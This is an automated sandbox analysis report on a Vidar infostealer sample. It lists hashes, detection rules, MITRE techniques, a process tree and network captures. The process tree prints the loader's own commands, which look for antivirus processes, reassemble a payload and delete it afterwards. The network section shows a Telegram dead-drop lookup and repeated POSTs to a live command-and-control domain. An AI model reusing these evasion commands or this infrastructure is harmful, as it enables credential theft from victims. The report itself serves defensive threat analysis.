vidar | f144e645673a830c564b7d50b6b1660767a488059874b2a60a47b8d098bcfc78

Analysis

max time kernel
150s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
23/12/2024, 11:23 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f144e645673a830c564b7d50b6b1660767a488059874b2a60a47b8d098bcfc78_Sigmanly.exe
Size

1.1MB
MD5

7bc8c8c16081e8d9cebcce0d93bc5f8d
SHA1

948d3349e7fc284fe648098d85ba7341258847f3
SHA256

f144e645673a830c564b7d50b6b1660767a488059874b2a60a47b8d098bcfc78
SHA512

2a5fc41f2d958cb52466808ee664cef9f559c972bf029424a3936e1391c94213f38d18779297473cdd09bf90f83d5fa53ed05a8fca3e3b5e56e3d8cfe3608379
SSDEEP

24576:znylYik3Jygua29LaP9r4ASTVSpe/E+oo+9c1K:7ylYi4wguaguVLyoEN+9c1K

Score

10^/10

vidar credential_access discovery spyware stealer

Malware Config

Signatures

Detect Vidar Stealer 4 IoCs

stealer

resource	yara_rule
behavioral2/memory/1580-45-0x0000000003FF0000-0x0000000004229000-memory.dmp	family_vidar_v7
behavioral2/memory/1580-44-0x0000000003FF0000-0x0000000004229000-memory.dmp	family_vidar_v7
behavioral2/memory/1580-52-0x0000000003FF0000-0x0000000004229000-memory.dmp	family_vidar_v7
behavioral2/memory/1580-53-0x0000000003FF0000-0x0000000004229000-memory.dmp	family_vidar_v7

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Vidar family
vidar

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	f144e645673a830c564b7d50b6b1660767a488059874b2a60a47b8d098bcfc78_Sigmanly.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	Relationship.com

Deletes itself 1 IoCs

pid	Process
1580	Relationship.com

Executes dropped EXE 1 IoCs

pid	Process
1580	Relationship.com

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates processes with tasklist 1 TTPs 2 IoCs

discovery

Process Discovery

T1057

pid	Process
4288	tasklist.exe
556	tasklist.exe

Drops file in Windows directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\BlacksAtomic	f144e645673a830c564b7d50b6b1660767a488059874b2a60a47b8d098bcfc78_Sigmanly.exe
File opened for modification	C:\Windows\AxisEach	f144e645673a830c564b7d50b6b1660767a488059874b2a60a47b8d098bcfc78_Sigmanly.exe
File opened for modification	C:\Windows\BecauseMarch	f144e645673a830c564b7d50b6b1660767a488059874b2a60a47b8d098bcfc78_Sigmanly.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 13 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	f144e645673a830c564b7d50b6b1660767a488059874b2a60a47b8d098bcfc78_Sigmanly.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Relationship.com

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Relationship.com
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Relationship.com

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
4436	timeout.exe

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
1580	Relationship.com
1580	Relationship.com
1580	Relationship.com
1580	Relationship.com
1580	Relationship.com
1580	Relationship.com
1580	Relationship.com
1580	Relationship.com
1580	Relationship.com
1580	Relationship.com
1580	Relationship.com
1580	Relationship.com
1580	Relationship.com
1580	Relationship.com
1580	Relationship.com
1580	Relationship.com
1580	Relationship.com
1580	Relationship.com
1580	Relationship.com
1580	Relationship.com

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	4288	tasklist.exe
Token: SeDebugPrivilege	556	tasklist.exe

Suspicious use of FindShellTrayWindow 3 IoCs

pid	Process
1580	Relationship.com
1580	Relationship.com
1580	Relationship.com

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
1580	Relationship.com
1580	Relationship.com
1580	Relationship.com

Suspicious use of WriteProcessMemory 36 IoCs

description	pid	Process	procid_target
PID 2064 wrote to memory of 4484	2064	f144e645673a830c564b7d50b6b1660767a488059874b2a60a47b8d098bcfc78_Sigmanly.exe	83
PID 2064 wrote to memory of 4484	2064	f144e645673a830c564b7d50b6b1660767a488059874b2a60a47b8d098bcfc78_Sigmanly.exe	83
PID 2064 wrote to memory of 4484	2064	f144e645673a830c564b7d50b6b1660767a488059874b2a60a47b8d098bcfc78_Sigmanly.exe	83
PID 4484 wrote to memory of 4288	4484	cmd.exe	86
PID 4484 wrote to memory of 4288	4484	cmd.exe	86
PID 4484 wrote to memory of 4288	4484	cmd.exe	86
PID 4484 wrote to memory of 232	4484	cmd.exe	87
PID 4484 wrote to memory of 232	4484	cmd.exe	87
PID 4484 wrote to memory of 232	4484	cmd.exe	87
PID 4484 wrote to memory of 556	4484	cmd.exe	90
PID 4484 wrote to memory of 556	4484	cmd.exe	90
PID 4484 wrote to memory of 556	4484	cmd.exe	90
PID 4484 wrote to memory of 436	4484	cmd.exe	91
PID 4484 wrote to memory of 436	4484	cmd.exe	91
PID 4484 wrote to memory of 436	4484	cmd.exe	91
PID 4484 wrote to memory of 744	4484	cmd.exe	92
PID 4484 wrote to memory of 744	4484	cmd.exe	92
PID 4484 wrote to memory of 744	4484	cmd.exe	92
PID 4484 wrote to memory of 2816	4484	cmd.exe	93
PID 4484 wrote to memory of 2816	4484	cmd.exe	93
PID 4484 wrote to memory of 2816	4484	cmd.exe	93
PID 4484 wrote to memory of 3652	4484	cmd.exe	94
PID 4484 wrote to memory of 3652	4484	cmd.exe	94
PID 4484 wrote to memory of 3652	4484	cmd.exe	94
PID 4484 wrote to memory of 1580	4484	cmd.exe	95
PID 4484 wrote to memory of 1580	4484	cmd.exe	95
PID 4484 wrote to memory of 1580	4484	cmd.exe	95
PID 4484 wrote to memory of 5104	4484	cmd.exe	96
PID 4484 wrote to memory of 5104	4484	cmd.exe	96
PID 4484 wrote to memory of 5104	4484	cmd.exe	96
PID 1580 wrote to memory of 4284	1580	Relationship.com	109
PID 1580 wrote to memory of 4284	1580	Relationship.com	109
PID 1580 wrote to memory of 4284	1580	Relationship.com	109
PID 4284 wrote to memory of 4436	4284	cmd.exe	111
PID 4284 wrote to memory of 4436	4284	cmd.exe	111
PID 4284 wrote to memory of 4436	4284	cmd.exe	111

C:\Users\Admin\AppData\Local\Temp\f144e645673a830c564b7d50b6b1660767a488059874b2a60a47b8d098bcfc78_Sigmanly.exe
"C:\Users\Admin\AppData\Local\Temp\f144e645673a830c564b7d50b6b1660767a488059874b2a60a47b8d098bcfc78_Sigmanly.exe"
1⤵
- Checks computer location settings
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2064
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c move Jam Jam.cmd & Jam.cmd
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4484
- - C:\Windows\SysWOW64\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:4288
- - C:\Windows\SysWOW64\findstr.exe
    findstr /I "opssvc wrsa"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:232
- - C:\Windows\SysWOW64\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:556
- - C:\Windows\SysWOW64\findstr.exe
    findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:436
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c md 523266
    3⤵
    - System Location Discovery: System Language Discovery
    PID:744
- - C:\Windows\SysWOW64\findstr.exe
    findstr /V "landing" Ca
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2816
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c copy /b ..\Existing + ..\Lower + ..\Wants + ..\Elvis + ..\Distribution x
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3652
- - C:\Users\Admin\AppData\Local\Temp\523266\Relationship.com
    Relationship.com x
    3⤵
    - Checks computer location settings
    - Deletes itself
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID:1580
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\523266\Relationship.com" & rd /s /q "C:\ProgramData\KNG4E3OZMOZU" & exit
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4284
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 10
        5⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:4436
- - C:\Windows\SysWOW64\choice.exe
    choice /d y /t 5
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5104

Network

DNS

154.239.44.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

154.239.44.20.in-addr.arpa

IN PTR

Response
DNS

134.32.126.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

134.32.126.40.in-addr.arpa

IN PTR

Response
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

ezaZTimpWHt.ezaZTimpWHt

Relationship.com

Remote address:

8.8.8.8:53

Request

ezaZTimpWHt.ezaZTimpWHt

IN A

Response
DNS

149.220.183.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

149.220.183.52.in-addr.arpa

IN PTR

Response
DNS

97.17.167.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

97.17.167.52.in-addr.arpa

IN PTR

Response
DNS

t.me

Relationship.com

Remote address:

8.8.8.8:53

Request

t.me

IN A

Response

t.me

IN A

149.154.167.99
GET

https://t.me/k04ael

Relationship.com

Remote address:

149.154.167.99:443

Request

GET /k04ael HTTP/1.1
Host: t.me
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Mon, 23 Dec 2024 11:23:59 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 12299
Connection: keep-alive
Set-Cookie: stel_ssid=4d09b44e045bf3e3bc_12623440586734257018; expires=Tue, 24 Dec 2024 11:23:59 GMT; path=/; samesite=None; secure; HttpOnly
Pragma: no-cache
Cache-control: no-store
X-Frame-Options: ALLOW-FROM https://web.telegram.org
Content-Security-Policy: frame-ancestors https://web.telegram.org
Strict-Transport-Security: max-age=35768000
DNS

bijutr.shop

Relationship.com

Remote address:

8.8.8.8:53

Request

bijutr.shop

IN A

Response

bijutr.shop

IN A

188.245.216.205
GET

https://bijutr.shop/

Relationship.com

Remote address:

188.245.216.205:443

Request

GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Mon, 23 Dec 2024 11:23:59 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
DNS

99.167.154.149.in-addr.arpa

Remote address:

8.8.8.8:53

Request

99.167.154.149.in-addr.arpa

IN PTR

Response
POST

https://bijutr.shop/

Relationship.com

Remote address:

188.245.216.205:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----ZCTRQ9R1VKF3EU3OZCT0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 256
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Mon, 23 Dec 2024 11:24:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

https://bijutr.shop/

Relationship.com

Remote address:

188.245.216.205:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----WT2NOZMOZU3E3ECTRIW4
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 299
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Mon, 23 Dec 2024 11:24:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
DNS

e5.o.lencr.org

Relationship.com

Remote address:

8.8.8.8:53

Request

e5.o.lencr.org

IN A

Response

e5.o.lencr.org

IN CNAME

o.lencr.edgesuite.net

o.lencr.edgesuite.net

IN CNAME

a1887.dscq.akamai.net

a1887.dscq.akamai.net

IN A

88.221.135.115

a1887.dscq.akamai.net

IN A

88.221.135.105

a1887.dscq.akamai.net

IN A

88.221.135.98

a1887.dscq.akamai.net

IN A

88.221.134.89

a1887.dscq.akamai.net

IN A

88.221.134.137
GET

http://e5.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQeEcDJrP2kU%2B9LL2pzIRVgTVStuQQUmc0pw6FYJq96ekyEWo9ziGCw394CEgNwz8PXImKfnhVNHh00GVNPyQ%3D%3D

Relationship.com

Remote address:

88.221.135.115:80

Request

GET /MFMwUTBPME0wSzAJBgUrDgMCGgUABBQeEcDJrP2kU%2B9LL2pzIRVgTVStuQQUmc0pw6FYJq96ekyEWo9ziGCw394CEgNwz8PXImKfnhVNHh00GVNPyQ%3D%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: e5.o.lencr.org

Response

HTTP/1.1 200 OK

Server: nginx
Content-Type: application/ocsp-response
Content-Length: 345
ETag: "925107482F0B720C871FA7FEB51669ACDE93F83B32EB860D03676CBAF4B83E3B"
Last-Modified: Mon, 23 Dec 2024 08:54:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=12691
Expires: Mon, 23 Dec 2024 14:55:31 GMT
Date: Mon, 23 Dec 2024 11:24:00 GMT
Connection: keep-alive
DNS

205.216.245.188.in-addr.arpa

Remote address:

8.8.8.8:53

Request

205.216.245.188.in-addr.arpa

IN PTR

Response

205.216.245.188.in-addr.arpa

IN PTR

static205216245188clientsyour-serverde
DNS

51.189.46.23.in-addr.arpa

Remote address:

8.8.8.8:53

Request

51.189.46.23.in-addr.arpa

IN PTR

Response

51.189.46.23.in-addr.arpa

IN PTR

a23-46-189-51deploystaticakamaitechnologiescom
DNS

115.135.221.88.in-addr.arpa

Remote address:

8.8.8.8:53

Request

115.135.221.88.in-addr.arpa

IN PTR

Response

115.135.221.88.in-addr.arpa

IN PTR

a88-221-135-115deploystaticakamaitechnologiescom
POST

https://bijutr.shop/

Relationship.com

Remote address:

188.245.216.205:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----N79HDBSJMYM7YUS0R1NY
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 299
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Mon, 23 Dec 2024 11:24:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

https://bijutr.shop/

Relationship.com

Remote address:

188.245.216.205:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----IECBS26PZ58QIMOZU37Q
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 300
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Mon, 23 Dec 2024 11:24:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

https://bijutr.shop/

Relationship.com

Remote address:

188.245.216.205:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----79RQ1VS0ZU3EUASJMGVK
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 299
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Mon, 23 Dec 2024 11:24:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

https://bijutr.shop/

Relationship.com

Remote address:

188.245.216.205:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----9HVSRQ90HDJM7QIW4OHD
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 299
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Mon, 23 Dec 2024 11:24:03 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

https://bijutr.shop/

Relationship.com

Remote address:

188.245.216.205:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----1NG4WBAS0ZUAAIWBIWL6
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 299
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Mon, 23 Dec 2024 11:24:04 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
DNS

53.210.109.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

53.210.109.20.in-addr.arpa

IN PTR

Response
DNS

241.42.69.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

241.42.69.40.in-addr.arpa

IN PTR

Response
DNS

182.129.81.91.in-addr.arpa

Remote address:

8.8.8.8:53

Request

182.129.81.91.in-addr.arpa

IN PTR

Response
DNS

48.229.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

48.229.111.52.in-addr.arpa

IN PTR

Response

149.154.167.99:443

https://t.me/k04ael

tls, http

Relationship.com

1.5kB
19.4kB
24
20

HTTP Request

GET https://t.me/k04ael

HTTP Response

200
188.245.216.205:443

https://bijutr.shop/

tls, http

Relationship.com

1.0kB
3.0kB
11
8

HTTP Request

GET https://bijutr.shop/

HTTP Response

200
188.245.216.205:443

https://bijutr.shop/

tls, http

Relationship.com

1.4kB
565 B
9
6

HTTP Request

POST https://bijutr.shop/

HTTP Response

200
188.245.216.205:443

https://bijutr.shop/

tls, http

Relationship.com

1.5kB
598 B
9
7

HTTP Request

POST https://bijutr.shop/

HTTP Response

200
88.221.135.115:80

http://e5.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQeEcDJrP2kU%2B9LL2pzIRVgTVStuQQUmc0pw6FYJq96ekyEWo9ziGCw394CEgNwz8PXImKfnhVNHh00GVNPyQ%3D%3D

http

Relationship.com

467 B
863 B
5
3

HTTP Request

GET http://e5.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQeEcDJrP2kU%2B9LL2pzIRVgTVStuQQUmc0pw6FYJq96ekyEWo9ziGCw394CEgNwz8PXImKfnhVNHh00GVNPyQ%3D%3D

HTTP Response

200
188.245.216.205:443

https://bijutr.shop/

tls, http

Relationship.com

1.5kB
558 B
9
6

HTTP Request

POST https://bijutr.shop/

HTTP Response

200
188.245.216.205:443

https://bijutr.shop/

tls, http

Relationship.com

1.5kB
558 B
9
6

HTTP Request

POST https://bijutr.shop/

HTTP Response

200
188.245.216.205:443

https://bijutr.shop/

tls, http

Relationship.com

1.5kB
558 B
9
6

HTTP Request

POST https://bijutr.shop/

HTTP Response

200
188.245.216.205:443

https://bijutr.shop/

tls, http

Relationship.com

1.4kB
518 B
8
5

HTTP Request

POST https://bijutr.shop/

HTTP Response

200
188.245.216.205:443

https://bijutr.shop/

tls, http

Relationship.com

1.4kB
518 B
8
5

HTTP Request

POST https://bijutr.shop/

HTTP Response

200

8.8.8.8:53

154.239.44.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

154.239.44.20.in-addr.arpa
8.8.8.8:53

134.32.126.40.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

134.32.126.40.in-addr.arpa
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

ezaZTimpWHt.ezaZTimpWHt

dns

Relationship.com

69 B
144 B
1
1

DNS Request

ezaZTimpWHt.ezaZTimpWHt
8.8.8.8:53

149.220.183.52.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

149.220.183.52.in-addr.arpa
8.8.8.8:53

97.17.167.52.in-addr.arpa

dns

71 B
145 B
1
1

DNS Request

97.17.167.52.in-addr.arpa
8.8.8.8:53

t.me

dns

Relationship.com

50 B
66 B
1
1

DNS Request

t.me

DNS Response

149.154.167.99
8.8.8.8:53

bijutr.shop

dns

Relationship.com

57 B
73 B
1
1

DNS Request

bijutr.shop

DNS Response

188.245.216.205
8.8.8.8:53

99.167.154.149.in-addr.arpa

dns

73 B
166 B
1
1

DNS Request

99.167.154.149.in-addr.arpa
8.8.8.8:53

e5.o.lencr.org

dns

Relationship.com

60 B
207 B
1
1

DNS Request

e5.o.lencr.org

DNS Response

88.221.135.115

88.221.135.105

88.221.135.98

88.221.134.89

88.221.134.137
8.8.8.8:53

205.216.245.188.in-addr.arpa

dns

74 B
133 B
1
1

DNS Request

205.216.245.188.in-addr.arpa
8.8.8.8:53

51.189.46.23.in-addr.arpa

dns

71 B
135 B
1
1

DNS Request

51.189.46.23.in-addr.arpa
8.8.8.8:53

115.135.221.88.in-addr.arpa

dns

73 B
139 B
1
1

DNS Request

115.135.221.88.in-addr.arpa
8.8.8.8:53

53.210.109.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

53.210.109.20.in-addr.arpa
8.8.8.8:53

241.42.69.40.in-addr.arpa

dns

71 B
145 B
1
1

DNS Request

241.42.69.40.in-addr.arpa
8.8.8.8:53

182.129.81.91.in-addr.arpa

dns

72 B
147 B
1
1

DNS Request

182.129.81.91.in-addr.arpa
8.8.8.8:53

48.229.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

48.229.111.52.in-addr.arpa
8.8.8.8:53

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\523266\Relationship.com

Filesize
925KB

MD5
62d09f076e6e0240548c2f837536a46a

SHA1
26bdbc63af8abae9a8fb6ec0913a307ef6614cf2

SHA256
1300262a9d6bb6fcbefc0d299cce194435790e70b9c7b4a651e202e90a32fd49

SHA512
32de0d8bb57f3d3eb01d16950b07176866c7fb2e737d9811f61f7be6606a6a38a5fc5d4d2ae54a190636409b2a7943abca292d6cefaa89df1fc474a1312c695f

Download Submit
C:\Users\Admin\AppData\Local\Temp\523266\x

Filesize
285KB

MD5
f4eaef20d7cb249c38bd71e18beb5c75

SHA1
d61cac3b42d1eb9d6aaf2ac579fa7dfb1d8d5df5

SHA256
128aae5ca769c545558de704b2da34ff4b3a0f9a1c8637d108a4bc68235c3691

SHA512
d2ece85d86b64ff9ae2ba3992621773fcc9069ce8b4855d6d75727d594587dd96df64d307b5f77ba9382dbc4675729eb9330b60db3ecc651f0a0dd9bd470673d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Altered

Filesize
97KB

MD5
041e0a2909f73d050592ee44b6206aee

SHA1
eef9934e108cb1f535ce0931c38da705f99f38d2

SHA256
40a2e1bb4e06f36bbe8e447a73337b0f1bef79aaf290bdbd363a051f361efe36

SHA512
cb2ef1260fc75b1ca77289f9e581a303d2d461b3886d2ec70afbef16b8cc1b6a6ba3eb009edfc24df1eace7e2a59638cf381eea5351f90abde68fcfae2ed3a27

Download Submit
C:\Users\Admin\AppData\Local\Temp\Ca

Filesize
1KB

MD5
e9fbb8fac667c2932e012ce1462f1d67

SHA1
2ea8bd2feb443cefb68b4ea8508fb1924666392b

SHA256
17029a8d3933139b442077a90799f7880770dce3143b3f27dc6299e526a04aaf

SHA512
b5aca0065b6c41a12b9d3b5a468c0aae2ac743d9c0f9d65efc04059e084b9a3f461356e4130feca3d16ea854724986e97f66dbdfdfe5080b8f45ee809dbe9a16

Download Submit
C:\Users\Admin\AppData\Local\Temp\Distribution

Filesize
21KB

MD5
4f7dc35d83aba1debdf610f61d8354eb

SHA1
e096c018e27a56df92597717547f70af75d0b37d

SHA256
c60fbe3c4a9eca49b48022e6a2e7ba5d6ab52d70ee1366efd34ccba539604543

SHA512
fcf46720f70eb6ad76de262790ba4590b10ef1cc62a010384a459ebe3511b59feeff2351cde0b32718ba37fae3bb13c4ffe51153bf345e36a3edfd27909da4da

Download Submit
C:\Users\Admin\AppData\Local\Temp\Dsc

Filesize
66KB

MD5
7444be6fdc34510517b96b373bce699b

SHA1
7f31a4dd2ff289ce6be7be3ba634ab918e3a4fb9

SHA256
eae9ef63f97f313e74b78fa687dad66d00df8c8ee3663e5d093727bf92c35e47

SHA512
08ba0324adfa33c8d547bb0e8d6f107ee331c0f5fdea67f4a1cf70c0324298429f3d2fbf88d2b0361c6b11134bfaf6e84924f3167a63a8acf7b6d9420628b198

Download Submit
C:\Users\Admin\AppData\Local\Temp\Elvis

Filesize
60KB

MD5
203eaa7c046a7e5c616d72bb500e2525

SHA1
f1b8e88e05e2562e148e0b085f01d99735751524

SHA256
5f5ee058b13874af192318d6f69881b90ac6feee483b5d0f7055fd9546d1ba94

SHA512
19facf262754aafd90c5a042de45bbdd4a5315f7dc58a08350d9ed39c83268eef709a0f168c7215d2197ac358832b75451c4ef70fe73a29bc2638ca8442bad47

Download Submit
C:\Users\Admin\AppData\Local\Temp\Existing

Filesize
67KB

MD5
8f4decd2a4d2d05ffddb7c403561f346

SHA1
385ca964d82c77f9624c165c73503f1b7e412155

SHA256
391d54bef0b972cf5b3bf134e6c29867a3d30d373679bf06459205dc93feb385

SHA512
26f012c839a091523a1884619ef14bb32efacfb0343810a2618f4dbd358083a574900a121c835874d812212a56618753c9aabedf146ef222e455d51b0583d573

Download Submit
